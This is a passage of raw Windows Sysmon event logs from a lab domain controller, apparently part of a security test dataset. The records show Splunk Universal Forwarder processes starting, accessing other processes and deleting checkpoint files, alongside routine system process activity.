Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002245443Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:02.988{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6E9A-603E-10AB-00000000AD01}5016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002245442Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:02.985{05ADC7E1-6E9A-603E-10AB-00000000AD01}5016C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002245441Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:02.783{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1AF3A6D8CBF648F648C9EB8162D3A80,SHA256=E6C6E07E55FCBDB56447463576AA3C7E04034846D780ADFA66222A9791BF07C2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002245461Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:03.843{05ADC7E1-6E9B-603E-11AB-00000000AD01}1284815548C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002245460Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:03.811{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D682AC3CF7F66C05EF8DFAF3449E5A9E,SHA256=E39EAA2F7DE98DADF0D8926F4CE059912653208A73B0DA53734BD343ACA236BD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002245459Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:03.655{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6E9B-603E-11AB-00000000AD01}12848C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245458Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:03.655{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245457Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:03.655{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245456Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:03.655{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245455Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:03.655{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245454Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:03.655{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-6E9B-603E-11AB-00000000AD01}12848C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002245453Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:03.655{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6E9B-603E-11AB-00000000AD01}12848C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002245452Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:03.656{05ADC7E1-6E9B-603E-11AB-00000000AD01}12848C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002245451Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:03.233{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2DCC061832715D4F6DF53E47A06EEF03,SHA256=57247216E9E02788DDA57484EC732B3B4392EEB7EB26DCA3769AB017A43F5468,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002245450Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:03.187{05ADC7E1-6E9A-603E-10AB-00000000AD01}501611564C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002245471Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:04.843{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22C8F354DAA5BD5DECE60767DBCCA023,SHA256=0FE5373ACE62152D72FBB7F720BB4927809FC4CCA63435FD682C71FF735C1A3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245470Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:04.671{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=48A1306E6CF699742D2A8011C691EC74,SHA256=ED92503743F28A7AF52B920262EC484C2C4B5C04ADE7A957D32986EC2F9D9917,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002245469Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:04.327{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6E9C-603E-12AB-00000000AD01}11220C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245468Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:04.327{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245467Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:04.327{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245466Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:04.327{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245465Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:04.327{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245464Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:04.327{05ADC7E1-229D-6039-0500-00000000AD01}6361168C:\Windows\system32\csrss.exe{05ADC7E1-6E9C-603E-12AB-00000000AD01}11220C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002245463Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:04.327{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6E9C-603E-12AB-00000000AD01}11220C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002245462Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:04.328{05ADC7E1-6E9C-603E-12AB-00000000AD01}11220C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002245481Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:05.881{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0433962868E640FD75CE85CF4118FEF,SHA256=A575E3F3B8BDEF0FF8CD4776AB24304F4D4BF0BE7D885E2B5CF551D69567058D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002245480Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:05.202{05ADC7E1-6E9D-603E-13AB-00000000AD01}1566011688C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245479Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:04.999{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6E9D-603E-13AB-00000000AD01}15660C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245478Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:04.999{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245477Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:04.999{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245476Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 